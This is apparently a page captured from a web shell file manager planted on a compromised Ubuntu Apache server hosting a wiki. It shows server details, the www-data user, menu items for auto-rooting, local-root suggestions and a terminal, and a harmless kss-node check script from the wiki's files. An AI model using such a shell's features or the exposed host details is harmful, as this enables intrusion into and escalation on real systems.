Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
docs /
kss /
scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
kss-node-check.sh
677
B
-rwxr-xr-x
2016-11-28 20:20
Save
Rename
#!/usr/bin/env bash if command -v npm > /dev/null ; then npm install else # If npm isn't installed, but kss-node is, exit normally. # This allows setting it up on one machine, and running it on # another (e.g. Tools Labs execution nodes) that doesn't have npm # installed. However, "npm install" still needs to be run # occasionally to keep kss updated. KSS_NODE="${BASH_SOURCE%/*}/../node_modules/.bin/kss-node" if ! [ -x "$KSS_NODE" ] ; then echo "Neither kss-node nor npm are installed." echo "To install npm, see http://nodejs.org/" echo "When npm is installed, the Makefile can automatically" echo "install kss-node." exit 1 fi fi